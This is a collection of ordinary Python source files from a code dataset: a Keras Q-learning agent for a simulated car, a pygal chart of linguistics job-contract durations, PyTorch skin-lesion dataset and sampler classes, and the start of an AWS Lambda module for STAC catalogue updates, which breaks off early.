self.parameters['output_length'] = len(self.parameters['actions'])
self.epoch = 0
self.replay,self.replay_index = [],0
self.itr,self.avg_loss,self.avg_score = 0,0,0
self.train_hist = None
self.log = {'avg_loss':[],'final_score':[],'state':[],'cross_score':[],'epoch':[]}
def random_seed(self,seed):
random.seed(seed)
def generate_nn(self):
self.model = keras.models.Sequential()
weights_init = keras.initializers.Constant(value=0.1) #'lecun_uniform'
activation = None
self.model.add(keras.layers.Dense(20, kernel_initializer=weights_init, input_shape=(self.parameters['state_dimension'],), activation=activation))
self.model.add(keras.layers.LeakyReLU(alpha=self.parameters['leak_alpha']))
self.model.add(keras.layers.Dense(self.parameters['output_length'], kernel_initializer=weights_init, activation=activation))
self.model.add(keras.layers.LeakyReLU(alpha=self.parameters['leak_alpha']))
        # I found Adam is more stable (than SGD/RMSprop) in handling new samples of (X, y) and overfitting; it does still oscillate, but in a more subtle manner
optim = keras.optimizers.Adam(lr=self.parameters['lr_alpha'], beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0) #lr_alpha=0.001
self.model.compile(optimizer=optim, loss='mse')
def load_weights(self,weights):
self.model.load_weights(weights)
def take_action(self,agent,dt,epsilon_override=None):
sensor_readings = np.array(agent.get_sensor_reading())
q_vals = self.model.predict(sensor_readings.reshape(1,self.parameters['state_dimension']),batch_size=1,verbose=0)
if epsilon_override is not None:
epsilon = epsilon_override
else:
epsilon = self.parameters['epsilon']
if (random.random() > epsilon):
action = random.randint(0,self.parameters['output_length']-1)
else:
action = (np.argmax(q_vals))
v,s = self.parameters['actions'][action]
agent.set_velocity(v)
agent.set_steering(s)
agent.update(dt)
return sensor_readings,action
def reward_function(self,agent):
if agent.state == 'timeup':
reward = self.parameters['timeup_reward']
elif agent.state == 'collided':
reward = self.parameters['collision_reward']
elif agent.state == 'destination':
reward = self.parameters['destination_reward']
else:
#reward = 0
            #reward = agent.score # Encourages the car to MOVE, not necessarily forward; in fact, moving in circles is encouraged
#reward = -30+agent.score # Encourages the car to crash and end its misery
#reward = -1 # To factor in time but encourages the car to crash and end its misery. Useful if destination reward is high
reward = 1 if agent.score-agent.prev_score>0 else -1
return reward
def train_nn(self,sensor_readings,action,reward,new_sensor_readings,agent_state):
if (len(self.replay)<self.parameters['buffer_length']):
self.replay.append((sensor_readings,action,reward,new_sensor_readings,agent_state))
else:
self.replay_index += 1
if self.replay_index>=self.parameters['buffer_length']: self.replay_index=0
self.replay[self.replay_index] = ((sensor_readings,action,reward,new_sensor_readings,agent_state))
if (len(self.replay)>self.parameters['replay_start_at']):
minibatch = random.sample(self.replay, self.parameters['minibatchsize'])
mb_len = len(minibatch)
old_states = np.zeros(shape=(mb_len, self.parameters['state_dimension']))
old_actions = np.zeros(shape=(mb_len,))
rewards = np.zeros(shape=(mb_len,))
new_states = np.zeros(shape=(mb_len, self.parameters['state_dimension']))
car_state = []
for i, m in enumerate(minibatch):
old_state_m, action_m, reward_m, new_state_m, car_state_m = m
old_states[i, :] = old_state_m[...]
old_actions[i] = action_m
rewards[i] = reward_m
new_states[i, :] = new_state_m[...]
car_state.append(car_state_m)
car_state = np.array(car_state)
old_qvals = self.model.predict(old_states, batch_size=mb_len)
new_qvals = self.model.predict(new_states, batch_size=mb_len)
maxQs = np.max(new_qvals, axis=1)
y = old_qvals
non_term_inds = np.where(car_state == 'running')[0]
#non_term_inds = np.concatenate((non_term_inds,np.where(car_state == 'destination')[0]))
term_inds = np.where(car_state == 'timeup')[0]
term_inds = np.concatenate((term_inds,np.where(car_state == 'collided')[0]))
term_inds = np.concatenate((term_inds,np.where(car_state == 'destination')[0]))
y[non_term_inds, old_actions[non_term_inds].astype(int)] = rewards[non_term_inds] + (self.parameters['gamma'] * maxQs[non_term_inds])
y[term_inds, old_actions[term_inds].astype(int)] = rewards[term_inds]
X_train = old_states
y_train = y
self.train_hist = self.model.fit(X_train, y_train, batch_size=self.parameters['batchsize'], epochs=1, verbose=0)
def check_terminal_state_and_log(self,agent,env):
self.itr += 1
self.avg_loss = 0 if self.train_hist is None else (self.avg_loss+self.train_hist.history['loss'][0])
terminal_state,debug_data = None,None
if agent.state=='collided' or agent.state=='destination' or agent.state=='timeup':
self.epoch += 1
if (len(self.replay)>=self.parameters['replay_start_at']) and self.parameters['epsilon']<self.parameters['max_epsilon']:
self.parameters['epsilon'] += self.parameters['epsilon_step']
self.avg_loss /= self.itr
self.log['avg_loss'].append(self.avg_loss)
self.log['final_score'].append(agent.score)
self.log['state'].append(agent.state)
if self.avg_loss==0:
self.log['cross_score'].append(0)
else:
self.log['cross_score'].append(agent.score*(1/self.avg_loss))
self.log['epoch'].append(self.epoch)
if self.epoch%5==0:
self.avg_score = sum(self.log['final_score'][self.epoch-5:self.epoch])/5
np.save('./log',self.log)
self.model.save_weights(self.weights_save_dir+'rlcar_epoch_'+str(self.epoch).zfill(5))
            print('Epoch', self.epoch, 'Epsilon=', self.parameters['epsilon'], 'Run=', agent.state, 'Avg score=', self.avg_score, 'Avg loss=', self.avg_loss)
debug_data = '[Training]\n'+'Epoch '+str(self.epoch)+'\nEpsilon='+str(self.parameters['epsilon'])+'\nRun='+str(agent.state)+'\nAvg score='+'{:.2f}'.format(self.avg_score)+'\nAvg loss='+str(self.avg_loss)
self.avg_loss,self.itr = 0,0
terminal_state = agent.get_state()
agent.reset()
if self.parameters['random_car_position']==True:
agent.set_state([1+env.route[0].x+(env.track_width*1.2*(random.random()-0.5)),env.route[0].y+(env.track_width*1.2*(random.random()-0.5)),env.start_angle+(random.random()-0.5)])
return terminal_state,debug_data,self.log['epoch'],self.log['avg_loss'],self.log['final_score'],self.log['cross_score']
def check_terminal_state(self,agent):
terminal_state = None
if agent.state=='collided' or agent.state=='destination' or agent.state=='timeup':
terminal_state = agent.state
agent.reset()
return terminal_state
def learn_step(self,agent,env,dt):
sensor_values,action_taken = self.take_action(agent,dt)
env.compute_interaction([agent])
new_sensor_values = np.array(agent.get_sensor_reading())
reward = self.reward_function(agent)
self.train_nn(sensor_values,action_taken,reward,new_sensor_values,agent.state)
return self.check_terminal_state_and_log(agent,env)
def run_step(self,agent,env,dt):
self.take_action(agent,dt,epsilon_override=1.0)
return self.check_terminal_state(agent) | RL.py | import numpy as np
import random
import keras
class QLearning_NN():
def __init__(self,rl_params,weights_save_dir):
self.parameters = dict(rl_params)
self.weights_save_dir = weights_save_dir
self.parameters['output_length'] = len(self.parameters['actions'])
self.epoch = 0
self.replay,self.replay_index = [],0
self.itr,self.avg_loss,self.avg_score = 0,0,0
self.train_hist = None
self.log = {'avg_loss':[],'final_score':[],'state':[],'cross_score':[],'epoch':[]}
def random_seed(self,seed):
random.seed(seed)
def generate_nn(self):
self.model = keras.models.Sequential()
weights_init = keras.initializers.Constant(value=0.1) #'lecun_uniform'
activation = None
self.model.add(keras.layers.Dense(20, kernel_initializer=weights_init, input_shape=(self.parameters['state_dimension'],), activation=activation))
self.model.add(keras.layers.LeakyReLU(alpha=self.parameters['leak_alpha']))
self.model.add(keras.layers.Dense(self.parameters['output_length'], kernel_initializer=weights_init, activation=activation))
self.model.add(keras.layers.LeakyReLU(alpha=self.parameters['leak_alpha']))
        # I found Adam is more stable (than SGD/RMSprop) in handling new samples of (X, y) and overfitting; it does still oscillate, but in a more subtle manner
optim = keras.optimizers.Adam(lr=self.parameters['lr_alpha'], beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0) #lr_alpha=0.001
self.model.compile(optimizer=optim, loss='mse')
def load_weights(self,weights):
self.model.load_weights(weights)
def take_action(self,agent,dt,epsilon_override=None):
sensor_readings = np.array(agent.get_sensor_reading())
q_vals = self.model.predict(sensor_readings.reshape(1,self.parameters['state_dimension']),batch_size=1,verbose=0)
if epsilon_override is not None:
epsilon = epsilon_override
else:
epsilon = self.parameters['epsilon']
if (random.random() > epsilon):
action = random.randint(0,self.parameters['output_length']-1)
else:
action = (np.argmax(q_vals))
v,s = self.parameters['actions'][action]
agent.set_velocity(v)
agent.set_steering(s)
agent.update(dt)
return sensor_readings,action
def reward_function(self,agent):
if agent.state == 'timeup':
reward = self.parameters['timeup_reward']
elif agent.state == 'collided':
reward = self.parameters['collision_reward']
elif agent.state == 'destination':
reward = self.parameters['destination_reward']
else:
#reward = 0
            #reward = agent.score # Encourages the car to MOVE, not necessarily forward; in fact, moving in circles is encouraged
#reward = -30+agent.score # Encourages the car to crash and end its misery
#reward = -1 # To factor in time but encourages the car to crash and end its misery. Useful if destination reward is high
reward = 1 if agent.score-agent.prev_score>0 else -1
return reward
def train_nn(self,sensor_readings,action,reward,new_sensor_readings,agent_state):
if (len(self.replay)<self.parameters['buffer_length']):
self.replay.append((sensor_readings,action,reward,new_sensor_readings,agent_state))
else:
self.replay_index += 1
if self.replay_index>=self.parameters['buffer_length']: self.replay_index=0
self.replay[self.replay_index] = ((sensor_readings,action,reward,new_sensor_readings,agent_state))
if (len(self.replay)>self.parameters['replay_start_at']):
minibatch = random.sample(self.replay, self.parameters['minibatchsize'])
mb_len = len(minibatch)
old_states = np.zeros(shape=(mb_len, self.parameters['state_dimension']))
old_actions = np.zeros(shape=(mb_len,))
rewards = np.zeros(shape=(mb_len,))
new_states = np.zeros(shape=(mb_len, self.parameters['state_dimension']))
car_state = []
for i, m in enumerate(minibatch):
old_state_m, action_m, reward_m, new_state_m, car_state_m = m
old_states[i, :] = old_state_m[...]
old_actions[i] = action_m
rewards[i] = reward_m
new_states[i, :] = new_state_m[...]
car_state.append(car_state_m)
car_state = np.array(car_state)
old_qvals = self.model.predict(old_states, batch_size=mb_len)
new_qvals = self.model.predict(new_states, batch_size=mb_len)
maxQs = np.max(new_qvals, axis=1)
y = old_qvals
non_term_inds = np.where(car_state == 'running')[0]
#non_term_inds = np.concatenate((non_term_inds,np.where(car_state == 'destination')[0]))
term_inds = np.where(car_state == 'timeup')[0]
term_inds = np.concatenate((term_inds,np.where(car_state == 'collided')[0]))
term_inds = np.concatenate((term_inds,np.where(car_state == 'destination')[0]))
y[non_term_inds, old_actions[non_term_inds].astype(int)] = rewards[non_term_inds] + (self.parameters['gamma'] * maxQs[non_term_inds])
y[term_inds, old_actions[term_inds].astype(int)] = rewards[term_inds]
X_train = old_states
y_train = y
self.train_hist = self.model.fit(X_train, y_train, batch_size=self.parameters['batchsize'], epochs=1, verbose=0)
def check_terminal_state_and_log(self,agent,env):
self.itr += 1
self.avg_loss = 0 if self.train_hist is None else (self.avg_loss+self.train_hist.history['loss'][0])
terminal_state,debug_data = None,None
if agent.state=='collided' or agent.state=='destination' or agent.state=='timeup':
self.epoch += 1
if (len(self.replay)>=self.parameters['replay_start_at']) and self.parameters['epsilon']<self.parameters['max_epsilon']:
self.parameters['epsilon'] += self.parameters['epsilon_step']
self.avg_loss /= self.itr
self.log['avg_loss'].append(self.avg_loss)
self.log['final_score'].append(agent.score)
self.log['state'].append(agent.state)
if self.avg_loss==0:
self.log['cross_score'].append(0)
else:
self.log['cross_score'].append(agent.score*(1/self.avg_loss))
self.log['epoch'].append(self.epoch)
if self.epoch%5==0:
self.avg_score = sum(self.log['final_score'][self.epoch-5:self.epoch])/5
np.save('./log',self.log)
self.model.save_weights(self.weights_save_dir+'rlcar_epoch_'+str(self.epoch).zfill(5))
            print('Epoch', self.epoch, 'Epsilon=', self.parameters['epsilon'], 'Run=', agent.state, 'Avg score=', self.avg_score, 'Avg loss=', self.avg_loss)
debug_data = '[Training]\n'+'Epoch '+str(self.epoch)+'\nEpsilon='+str(self.parameters['epsilon'])+'\nRun='+str(agent.state)+'\nAvg score='+'{:.2f}'.format(self.avg_score)+'\nAvg loss='+str(self.avg_loss)
self.avg_loss,self.itr = 0,0
terminal_state = agent.get_state()
agent.reset()
if self.parameters['random_car_position']==True:
agent.set_state([1+env.route[0].x+(env.track_width*1.2*(random.random()-0.5)),env.route[0].y+(env.track_width*1.2*(random.random()-0.5)),env.start_angle+(random.random()-0.5)])
return terminal_state,debug_data,self.log['epoch'],self.log['avg_loss'],self.log['final_score'],self.log['cross_score']
def check_terminal_state(self,agent):
terminal_state = None
if agent.state=='collided' or agent.state=='destination' or agent.state=='timeup':
terminal_state = agent.state
agent.reset()
return terminal_state
def learn_step(self,agent,env,dt):
sensor_values,action_taken = self.take_action(agent,dt)
env.compute_interaction([agent])
new_sensor_values = np.array(agent.get_sensor_reading())
reward = self.reward_function(agent)
self.train_nn(sensor_values,action_taken,reward,new_sensor_values,agent.state)
return self.check_terminal_state_and_log(agent,env)
def run_step(self,agent,env,dt):
self.take_action(agent,dt,epsilon_override=1.0)
return self.check_terminal_state(agent) | 0.562898 | 0.232997 |
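# Editor's note: a hypothetical outer loop for the class above. The `agent` and
# `env` objects (the car simulator providing get_sensor_reading, compute_interaction,
# scoring and reset) and the rl_params dict come from the rest of this project and
# are assumed to exist; the step count and dt are placeholders.
def _example_training_loop(agent, env, rl_params, steps=10000, dt=0.1):
    learner = QLearning_NN(rl_params, weights_save_dir='./weights/')
    learner.random_seed(0)
    learner.generate_nn()
    for _ in range(steps):
        learner.learn_step(agent, env, dt)
    return learner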
import re
from os.path import join
import glob
import os
import pandas as pd
from datetime import date
import pygal
from pygal.style import BlueStyle
from pygal.style import DarkGreenBlueStyle
from pygal.style import TurquoiseStyle
from pygal.style import CleanStyle
from collections import Counter
from pygal.style import LightenStyle
def get_data():
with open("../data/romanistik-stellen_datensatz_2014-2021.csv", "r", encoding="utf8") as infile:
data = pd.read_csv(infile, sep="\t")
print(data.head())
return data
def prepare_data(data):
# Filter down to useable data
data = data.fillna(0)
data = data.loc[:,["include", "dauer_cat", "domain_ling"]]
data = data[data["include"] == 1]
data = data[data["domain_ling"] == 1]
print(data.head())
n = data.shape[0]
print("Anzahl der Datenpunkte", n)
from collections import Counter
data = dict(Counter(list(data.loc[:,"dauer_cat"])))
print(data)
return data,n
def viz(data,n):
dark_lighten_style = LightenStyle('#700925',
step=10,
font_family="FreeSans",
label_font_size = 12,
major_label_font_size = 12,
value_label_font_size = 12,
value_font_size = 12,
title_font_size = 16)
chart = pygal.HorizontalBar(
style=dark_lighten_style,
print_values = True,
show_legend = False,
legend_at_bottom = True,
legend_at_bottom_columns = 9,
legend_box_size=24,
range = (0,50))
chart.title = "Vertragslaufzeiten (nur Linguistik)"
chart.x_title = "Anteile der Vertragslaufzeiten in Prozent (n="+str(n)+")"
chart.y_title = "Monate"
chart.x_labels = ["unb.", "66+", "~60", "~48", "~36", "~24", "~12", "1-6"]
chart.add("Laufzeiten", [data["unb."]/n*100,
data["66+"]/n*100,
data["~60"]/n*100,
data["~48"]/n*100,
data["~36"]/n*100,
data["~24"]/n*100,
data["~12"]/n*100,
data["1-6"]/n*100,], formatter=lambda x: '{:.1f}%'.format(x))
chart.render_to_file("../img/romanistik_laufzeit-fachgebiet-ling.svg")
def main():
data = get_data()
data,n = prepare_data(data)
viz(data,n)
main() | code/viz_laufzeit_fachgebiet_ling.py | import re
from os.path import join
import glob
import os
import pandas as pd
from datetime import date
import pygal
from pygal.style import BlueStyle
from pygal.style import DarkGreenBlueStyle
from pygal.style import TurquoiseStyle
from pygal.style import CleanStyle
from collections import Counter
from pygal.style import LightenStyle
def get_data():
with open("../data/romanistik-stellen_datensatz_2014-2021.csv", "r", encoding="utf8") as infile:
data = pd.read_csv(infile, sep="\t")
print(data.head())
return data
def prepare_data(data):
# Filter down to useable data
data = data.fillna(0)
data = data.loc[:,["include", "dauer_cat", "domain_ling"]]
data = data[data["include"] == 1]
data = data[data["domain_ling"] == 1]
print(data.head())
n = data.shape[0]
print("Anzahl der Datenpunkte", n)
from collections import Counter
data = dict(Counter(list(data.loc[:,"dauer_cat"])))
print(data)
return data,n
def viz(data,n):
dark_lighten_style = LightenStyle('#700925',
step=10,
font_family="FreeSans",
label_font_size = 12,
major_label_font_size = 12,
value_label_font_size = 12,
value_font_size = 12,
title_font_size = 16)
chart = pygal.HorizontalBar(
style=dark_lighten_style,
print_values = True,
show_legend = False,
legend_at_bottom = True,
legend_at_bottom_columns = 9,
legend_box_size=24,
range = (0,50))
chart.title = "Vertragslaufzeiten (nur Linguistik)"
chart.x_title = "Anteile der Vertragslaufzeiten in Prozent (n="+str(n)+")"
chart.y_title = "Monate"
chart.x_labels = ["unb.", "66+", "~60", "~48", "~36", "~24", "~12", "1-6"]
chart.add("Laufzeiten", [data["unb."]/n*100,
data["66+"]/n*100,
data["~60"]/n*100,
data["~48"]/n*100,
data["~36"]/n*100,
data["~24"]/n*100,
data["~12"]/n*100,
data["1-6"]/n*100,], formatter=lambda x: '{:.1f}%'.format(x))
chart.render_to_file("../img/romanistik_laufzeit-fachgebiet-ling.svg")
def main():
data = get_data()
data,n = prepare_data(data)
viz(data,n)
main() | 0.144239 | 0.1811 |
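# Editor's note: a tiny sketch (with dummy counts) of the step the script above
# performs between prepare_data and viz: turning the Counter of 'dauer_cat'
# categories into the percentage series passed to chart.add().
def _example_percentages():
    counts = {'unb.': 40, '~36': 25, '~12': 35}
    n = sum(counts.values())
    order = ['unb.', '~36', '~12']
    return [counts.get(label, 0) / n * 100 for label in order]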
import torch
import torch.nn as nn
import torch.nn.functional as F
import pydicom
import numpy as np
import cv2
import re
import glob
import os, os.path as osp
from PIL import Image
from torch.utils.data import Dataset, Sampler
from .utils import _isnone
from .crop_tta import crop_tta, resize_for_crop
import numpy as np
def square_crop(img, random=True):
h, w = img.shape[:2]
if h == w: return img
s = min(h, w)
short_side = 0 if h<w else 1
xc, yc = h//2, w//2
if random:
offset = np.abs(h-w)
offset = np.random.randint(-offset, offset)
if short_side:
xc += offset//2
else:
yc += offset//2
x1, y1 = xc-s//2, yc-s//2
x1, y1 = max(0,x1), max(0,y1)
img_crop = img[x1:x1+s, y1:y1+s]
if img_crop.shape[0] != img_crop.shape[1]:
print(f'Shape is {img_crop.shape}')
return img
return img_crop
def generate_crops(img, num_crops=10):
h, w = img.shape[:2]
if h == w: return [img]
s = min(h, w)
short_side = 0 if h<w else 1
xc, yc = h//2, w//2
offset = np.abs(h-w)
offsets = np.unique(np.linspace(-offset+1, offset-1, num_crops).astype('int'))
crops = []
for off in offsets:
if short_side:
new_xc = xc-off//2
x1, y1 = new_xc-s//2, yc-s//2
else:
new_yc = yc-off//2
x1, y1 = xc-s//2, new_yc-s//2
x1, y1 = max(0,x1), max(0,y1)
crops += [img[x1:x1+s, y1:y1+s]]
if crops[-1].shape[0] != crops[-1].shape[1]:
print(f'Shape is {crops[-1].shape}')
print(img.shape)
print(x1, y1, s)
crops[-1] = img
return crops
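# Editor's note: a quick synthetic check of the two cropping helpers above. A
# 300x200 dummy image yields 200x200 crops: square_crop takes one (centred when
# random=False) and generate_crops slides the square window along the long side.
def _example_crops():
    dummy = np.zeros((300, 200, 3), dtype=np.uint8)
    centre = square_crop(dummy, random=False)          # (200, 200, 3)
    tta_crops = generate_crops(dummy, num_crops=5)     # list of (200, 200, 3) crops
    return centre.shape, [c.shape for c in tta_crops]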
class SkinDataset(Dataset):
def __init__(self,
imgfiles,
labels,
meta=None,
square=False,
square_tta=None,
crop_tta=None,
pad=None,
resize=None,
transform=None,
crop=None,
preprocessor=None,
flip=False,
verbose=True,
test_mode=False,
jsd=False,
onehot=False):
self.imgfiles = imgfiles
self.labels = labels
self.meta = meta
self.square = square
self.square_tta = square_tta
self.crop_tta = crop_tta
self.pad = pad
self.resize = resize
self.transform = transform
self.crop = crop
if self.crop:
self.crop_size = (self.crop.transforms[0].height, self.crop.transforms[0].width)
self.preprocessor = preprocessor
self.flip = flip
self.verbose = verbose
self.test_mode = test_mode
self.jsd = jsd
self.onehot = onehot
def process_image(self, X, jsd=False):
if self.pad: X = self.pad(X)
if self.resize: X = self.resize(image=X)['image']
if self.transform and not jsd: X = self.transform(image=X)['image']
if self.crop and not self.test_mode:
X = resize_for_crop(X, crop_size=self.crop_size)
X = self.crop(image=X)['image']
if self.preprocessor: X = self.preprocessor.preprocess(X)
return X.transpose(2, 0, 1)
def get(self, i):
try:
X = cv2.imread(self.imgfiles[i])
if _isnone(X):
X = cv2.imread(self.imgfiles[i].replace('jpg','png'))
if _isnone(X):
return None
if not _isnone(self.meta):
X = {'img': X}
X.update(self.meta[i])
return X
except Exception as e:
if self.verbose: print(e)
return None
@staticmethod
def flip_array(X, mode):
if mode == 0:
X = X[:,::-1]
elif mode == 1:
X = X[:,:,::-1]
elif mode == 2:
X = X[:,::-1,::-1]
elif mode == 3 and X.shape[-1] == X.shape[-2]:
X = X.transpose(0,2,1)
X = np.ascontiguousarray(X)
return X
def __len__(self):
return len(self.imgfiles)
def __getitem__(self, i):
X = self.get(i)
while _isnone(X):
if self.verbose: print('Failed to read {} !'.format(self.imgfiles[i]))
i = np.random.randint(len(self))
X = self.get(i)
if self.test_mode and self.square_tta:
if isinstance(X, dict):
X['img'] = generate_crops(X['img'], num_crops=self.square_tta)
X['img'] = np.asarray([self.process_image(_) for _ in X['img']])
for k,v in X.items():
if k == 'img': continue
X[k] = np.repeat(np.expand_dims(v, axis=0), X['img'].shape[0], axis=0)
else:
X = generate_crops(X, num_crops=self.square_tta)
X = np.asarray([self.process_image(_) for _ in X])
elif self.test_mode and self.crop_tta:
if isinstance(X, dict):
X['img'] = crop_tta(X['img'], crop_size=self.crop_size, num_crops=self.crop_tta)
X['img'] = np.asarray([self.process_image(_) for _ in X['img']])
for k,v in X.items():
if k == 'img': continue
X[k] = np.repeat(np.expand_dims(v, axis=0), X['img'].shape[0], axis=0)
else:
X = crop_tta(X, crop_size=self.crop_size, num_crops=self.crop_tta)
X = np.asarray([self.process_image(_) for _ in X])
else:
if isinstance(X, dict):
if self.square: X['img'] = square_crop(X['img'], random=not self.test_mode)
if self.jsd: raise Exception('JSD not supported when using metadata')
X['img'] = self.process_image(X['img'])
else:
if self.square: X = square_crop(X, random=not self.test_mode)
if self.jsd and not self.test_mode: X_orig = X.copy()
X = self.process_image(X)
if self.jsd and not self.test_mode:
# Additional aug
X_aug = self.process_image(X_orig)
X_orig = self.process_image(X_orig, jsd=True)
if self.onehot and not self.test_mode:
onehot_y = {
0: [1.,0.,0.],
1: [0.,1.,0.],
2: [0.,0.,1.]
}
y = self.labels[i]
if isinstance(y, str):
y = y.split(',')
y = [float(_) for _ in y]
else:
y = onehot_y[int(y)]
if len(y) == 1:
y = onehot_y[int(y[0])]
else:
y = self.labels[i]
if isinstance(y, str):
y = float(y)
if self.flip and not self.test_mode:
# X.shape = (C, H, W)
mode = np.random.randint(5)
if isinstance(X, dict):
X['img'] = self.flip_array(X['img'], mode)
else:
X = self.flip_array(X, mode)
if self.jsd and not self.test_mode:
X_aug = self.flip_array(X_aug, mode)
X_orig = self.flip_array(X_orig, mode)
if isinstance(X, dict):
X = {k: torch.tensor(v) for k,v in X.items()}
else:
X = torch.tensor(X)
if self.jsd and not self.test_mode:
X = (torch.tensor(X_orig), torch.tensor(X), torch.tensor(X_aug))
y = torch.tensor(y)
return X, y
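# Editor's note: a hypothetical construction of the dataset above. The resize /
# transform / crop callables are expected to follow the albumentations-style
# convention used in process_image (called as fn(image=...)['image']), and
# `preprocessor` is any object exposing .preprocess(); file paths and labels are
# placeholders supplied by the caller.
def _example_skin_dataset(imgfiles, labels, resize=None, transform=None, preprocessor=None):
    dataset = SkinDataset(imgfiles=imgfiles,
                          labels=labels,
                          square=True,
                          resize=resize,
                          transform=transform,
                          preprocessor=preprocessor,
                          flip=True,
                          test_mode=False)
    X, y = dataset[0]
    return X.shape, y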
class SiameseDataset(Dataset):
def __init__(self,
imgfiles,
labels,
pad=None,
resize=None,
transform=None,
crop=None,
preprocessor=None,
flip=False,
verbose=True,
test_mode=False):
self.imgfiles = imgfiles
self.labels = labels
self.pad = pad
self.resize = resize
self.transform = transform
self.crop = crop
self.preprocessor = preprocessor
self.flip = flip
self.verbose = verbose
self.test_mode = test_mode
self.posfiles = [self.imgfiles[i] for i in range(len(self.imgfiles)) if self.labels[i] == 1]
self.negfiles = [self.imgfiles[i] for i in range(len(self.imgfiles)) if self.labels[i] == 0]
self.get = self.get_test if self.test_mode else self.get_train
def process_image(self, X):
if self.pad: X = self.pad(X)
if self.resize: X = self.resize(image=X)['image']
if self.transform: X = self.transform(image=X)['image']
if self.crop: X = self.crop(image=X)['image']
if self.preprocessor: X = self.preprocessor.preprocess(X)
return X.transpose(2, 0, 1)
def _read_image(self, fp):
X = cv2.imread(fp)
if _isnone(X):
X = cv2.imread(fp.replace('jpg','png'))
return X
def get_test(self, i):
try:
return self._read_image(self.imgfiles[i])
except Exception as e:
if self.verbose: print(e)
return None
def get_train(self, i):
try:
pair_type = np.random.randint(4)
if pair_type <= 1:
X1 = self._read_image(np.random.choice(self.posfiles))
X2 = self._read_image(np.random.choice(self.negfiles))
elif pair_type == 2:
X1 = self._read_image(np.random.choice(self.posfiles))
X2 = self._read_image(np.random.choice(self.posfiles))
elif pair_type == 3:
X1 = self._read_image(np.random.choice(self.negfiles))
X2 = self._read_image(np.random.choice(self.negfiles))
return [X1, X2], pair_type
except Exception as e:
if self.verbose: print(e)
return None
def __len__(self):
return len(self.imgfiles)
def __getitem__(self, i):
X = self.get(i)
while _isnone(X):
if self.verbose: print('Failed to read {} !'.format(self.imgfiles[i]))
i = np.random.randint(len(self))
X = self.get(i)
if self.test_mode:
X = self.process_image(X)
y = self.labels[i]
else:
X, pair_type = X
X = np.asarray([self.process_image(_) for _ in X])
if pair_type <= 1:
y = 0 # different
else:
y = 1 # same
if self.flip and not self.test_mode:
# X.shape = (2, C, H, W)
mode = np.random.randint(5)
if mode == 0:
X = X[...,::-1]
elif mode == 1:
X = X[...,::-1,:]
elif mode == 2:
X = X[...,::-1,::-1]
elif mode == 3 and X.shape[-1] == X.shape[-2]:
X = X.swapaxes(-1, -2)
X = np.ascontiguousarray(X)
X = torch.tensor(X)
y = torch.tensor(y)
return X, y
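# Editor's note: a hypothetical construction of the siamese dataset above. In
# training mode each item is a (2, C, H, W) pair tensor whose label is 1 for a
# same-class pair and 0 for a mixed pair (see get_train); arguments follow the
# same conventions as SkinDataset and are placeholders here.
def _example_siamese_dataset(imgfiles, labels, resize=None, preprocessor=None):
    pairs = SiameseDataset(imgfiles=imgfiles, labels=labels,
                           resize=resize, preprocessor=preprocessor,
                           flip=True, test_mode=False)
    X, y = pairs[0]
    return X.shape, y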
class Upsampler(Sampler):
def __init__(self, dataset, upsample_factor=25):
super().__init__(data_source=dataset)
self.labels = np.asarray(dataset.labels)
self.num_pos = np.sum(self.labels >= 0.5)
self.num_neg = np.sum(self.labels < 0.5)
self.upsample_factor = upsample_factor
self.length = self.num_neg + upsample_factor * self.num_pos
def __len__(self):
return self.length
def __iter__(self):
indices = []
indices += list(np.where(self.labels < 0.5)[0])
indices += list(np.random.choice(np.where(self.labels >= 0.5)[0], self.upsample_factor * self.num_pos, replace=True))
indices = np.random.permutation(indices)
return iter(indices.tolist())
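# Editor's note: a sketch of plugging the sampler above into a PyTorch DataLoader.
# With upsample_factor=25 every positive image is drawn roughly 25 times per epoch
# while each negative is seen once; `train_dataset` is assumed to be one of the
# datasets defined in this module.
def _example_upsampled_loader(train_dataset, batch_size=32, num_workers=4):
    from torch.utils.data import DataLoader
    sampler = Upsampler(train_dataset, upsample_factor=25)
    return DataLoader(train_dataset, batch_size=batch_size,
                      sampler=sampler, num_workers=num_workers)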
class BalancedSampler(Sampler):
def __init__(self, dataset, weights=[2,1], pos_label=1):
super().__init__(data_source=dataset)
self.labels = np.asarray(dataset.labels)
self.pos_label = pos_label
self.num_pos = np.sum(self.labels == pos_label)
self.num_neg = np.sum(self.labels != pos_label)
# weights ordered as [neg, pos]
self.weights = np.asarray(weights)
self.weights = self.weights / np.sum(self.weights)
self.length = len(dataset.imgfiles)
def __len__(self):
return self.length
def __iter__(self):
indices = []
sample_neg = int(self.length * self.weights[0])
sample_pos = int(self.length * self.weights[1])
indices += list(np.random.choice(np.where(self.labels == self.pos_label)[0], sample_pos, replace=self.num_pos<sample_pos))
indices += list(np.random.choice(np.where(self.labels != self.pos_label)[0], sample_neg, replace=self.num_neg<sample_neg))
indices = np.random.permutation(indices)
return iter(indices.tolist())
class BenignSampler(Sampler):
def __init__(self, dataset, probas=None, weights=[2,1], pos_label=1):
super().__init__(data_source=dataset)
self.dataset = dataset # store
self.labels = np.asarray(dataset.labels)
self.imgfiles = np.asarray(dataset.imgfiles)
self.pos_label = pos_label
# Need to map image file to indices
self.img2index = {i : index for index, i in enumerate(self.imgfiles)}
self.negfiles = [im for i, im in enumerate(self.imgfiles) if self.labels[i] != pos_label]
self.num_pos = np.sum(self.labels == pos_label)
self.num_neg = np.sum(self.labels != pos_label)
# weights ordered as [neg, pos]
self.weights = np.asarray(weights)
self.weights = self.weights / np.sum(self.weights)
self.length = self.num_pos * 4
if type(probas) == type(None):
# Assign equal weight to all benigns
p = 1.0 / len(self.negfiles)
probas = {i : p for i in self.negfiles}
self.probas = probas
def __len__(self):
return self.length
def __iter__(self):
indices = []
probas = {self.img2index[k] : v for k,v in self.probas.items()}
sample_neg = int(self.length * self.weights[0])
sample_pos = int(self.length * self.weights[1])
indices += list(np.random.choice(np.where(self.labels == self.pos_label)[0], sample_pos, replace=self.num_pos<sample_pos))
# For negatives, sample based on weight
keys = [*probas]
values = np.asarray([probas[k] for k in keys])
indices += list(np.random.choice(keys, sample_neg, replace=sample_neg>len(keys), p=values))
indices = np.random.permutation(indices)
return iter(indices.tolist()) | src/factory/data/datasets.py | import torch
import os
import json
import base64
import gzip
import boto3
from satstac import Collection, Item
from stac_updater import utils
sns_client = boto3.client('sns')
s3_res = boto3.resource('s3')
ACCOUNT_ID = boto3.client('sts').get_caller_identity()['Account']
REGION = os.getenv('REGION')
NOTIFICATION_TOPIC = os.getenv('NOTIFICATION_TOPIC')
def kickoff(event, context):
